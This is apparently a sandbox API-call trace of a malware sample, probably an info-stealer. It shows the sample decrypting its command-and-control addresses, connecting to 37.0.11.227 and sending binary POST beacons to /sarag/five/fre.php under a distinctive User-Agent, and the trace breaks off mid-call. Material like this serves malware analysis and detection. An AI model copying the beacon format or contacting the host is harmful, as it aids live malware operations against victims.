LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.687] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0336.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.688] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0336.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.689] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0336.689] GetProcessHeap () returned 0x690000 [0336.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.690] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0336.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.691] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0336.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.693] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0336.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.694] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0336.694] GetProcessHeap () returned 0x690000 [0336.694] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0336.694] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0336.695] GetProcessHeap () returned 0x690000 [0336.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0336.695] GetProcessHeap () returned 0x690000 [0336.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.696] GetProcessHeap () returned 0x690000 [0336.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0336.696] GetProcessHeap () returned 0x690000 [0336.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0336.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0336.710] GetProcessHeap () returned 0x690000 [0336.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0336.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.711] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0336.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.712] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.713] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.713] GetProcessHeap () returned 0x690000 [0336.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0336.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.715] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0336.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.716] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0336.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.717] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0336.717] GetProcessHeap () returned 0x690000 [0336.717] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.718] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0336.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.719] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0336.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.720] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0336.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.720] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0336.720] GetProcessHeap () returned 0x690000 [0336.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0336.720] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0336.721] GetProcessHeap () returned 0x690000 [0336.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0336.721] socket (af=2, type=1, protocol=6) returned 0xc04 [0336.721] connect (s=0xc04, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0336.754] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0336.754] GetProcessHeap () returned 0x690000 [0336.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0336.754] GetProcessHeap () returned 0x690000 [0336.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0336.755] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.756] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0336.756] GetProcessHeap () returned 0x690000 [0336.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0336.756] GetProcessHeap () returned 0x690000 [0336.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.756] GetProcessHeap () returned 0x690000 [0336.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0336.756] GetProcessHeap () returned 0x690000 [0336.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0336.757] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.758] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0336.758] GetProcessHeap () returned 0x690000 [0336.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0336.758] GetProcessHeap () returned 0x690000 [0336.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.758] send (s=0xc04, buf=0x6ad508*, len=242, flags=0) returned 242 [0336.758] send (s=0xc04, buf=0x6aba40*, len=159, flags=0) returned 159 [0336.759] GetProcessHeap () returned 0x690000 [0336.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0336.759] recv (in: s=0xc04, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0336.846] GetProcessHeap () returned 0x690000 [0336.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0336.847] GetProcessHeap () returned 0x690000 [0336.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0336.848] GetProcessHeap () returned 0x690000 [0336.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0336.848] GetProcessHeap () returned 0x690000 [0336.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0336.849] closesocket (s=0xc04) returned 0 [0336.849] GetProcessHeap () returned 0x690000 [0336.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0336.849] GetProcessHeap () returned 0x690000 [0336.850] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.850] GetProcessHeap () returned 0x690000 [0336.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0336.851] GetProcessHeap () returned 0x690000 [0336.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0336.852] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1954) returned 0xc04 [0336.853] Sleep (dwMilliseconds=0xea60) [0336.855] GetProcessHeap () returned 0x690000 [0336.855] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0336.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.856] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0336.877] GetProcessHeap () returned 0x690000 [0336.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0336.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.878] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0336.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.879] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.880] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.880] GetProcessHeap () returned 0x690000 [0336.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0336.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.885] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0336.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.886] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0336.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.887] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0336.887] GetProcessHeap () returned 0x690000 [0336.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.888] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0336.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.888] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0336.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.889] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0336.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.890] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0336.890] GetProcessHeap () returned 0x690000 [0336.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0336.890] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0336.891] GetProcessHeap () returned 0x690000 [0336.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0336.891] GetProcessHeap () returned 0x690000 [0336.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.891] GetProcessHeap () returned 0x690000 [0336.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0336.892] GetProcessHeap () returned 0x690000 [0336.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0336.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.893] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0336.904] GetProcessHeap () returned 0x690000 [0336.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0336.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.905] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0336.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.906] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.907] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.907] GetProcessHeap () returned 0x690000 [0336.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0336.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.908] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0336.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.909] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0336.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.910] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0336.910] GetProcessHeap () returned 0x690000 [0336.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.911] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0336.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.912] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0336.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.913] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0336.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.914] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0336.914] GetProcessHeap () returned 0x690000 [0336.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0336.914] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0336.914] GetProcessHeap () returned 0x690000 [0336.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0336.914] socket (af=2, type=1, protocol=6) returned 0xc08 [0336.915] connect (s=0xc08, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0336.940] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0336.940] GetProcessHeap () returned 0x690000 [0336.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0336.940] GetProcessHeap () returned 0x690000 [0336.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0336.941] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.942] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0336.942] GetProcessHeap () returned 0x690000 [0336.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0336.942] GetProcessHeap () returned 0x690000 [0336.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.943] GetProcessHeap () returned 0x690000 [0336.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0336.943] GetProcessHeap () returned 0x690000 [0336.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0336.944] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.944] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0336.944] GetProcessHeap () returned 0x690000 [0336.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0336.944] GetProcessHeap () returned 0x690000 [0336.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.945] send (s=0xc08, buf=0x6ad508*, len=242, flags=0) returned 242 [0336.945] send (s=0xc08, buf=0x6aba40*, len=159, flags=0) returned 159 [0336.946] GetProcessHeap () returned 0x690000 [0336.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0336.946] recv (in: s=0xc08, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0337.020] GetProcessHeap () returned 0x690000 [0337.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0337.021] GetProcessHeap () returned 0x690000 [0337.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0337.022] GetProcessHeap () returned 0x690000 [0337.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0337.022] GetProcessHeap () returned 0x690000 [0337.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0337.022] closesocket (s=0xc08) returned 0 [0337.023] GetProcessHeap () returned 0x690000 [0337.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0337.023] GetProcessHeap () returned 0x690000 [0337.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0337.023] GetProcessHeap () returned 0x690000 [0337.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0337.024] GetProcessHeap () returned 0x690000 [0337.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0337.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1958) returned 0xc08 [0337.026] Sleep (dwMilliseconds=0xea60) [0337.027] GetProcessHeap () returned 0x690000 [0337.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0337.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.044] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0337.055] GetProcessHeap () returned 0x690000 [0337.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0337.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.056] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0337.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.057] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0337.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.059] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0337.059] GetProcessHeap () returned 0x690000 [0337.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0337.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.060] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0337.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.065] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0337.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.066] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0337.066] GetProcessHeap () returned 0x690000 [0337.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0337.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.072] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0337.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.077] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0337.078] LoadLibraryW 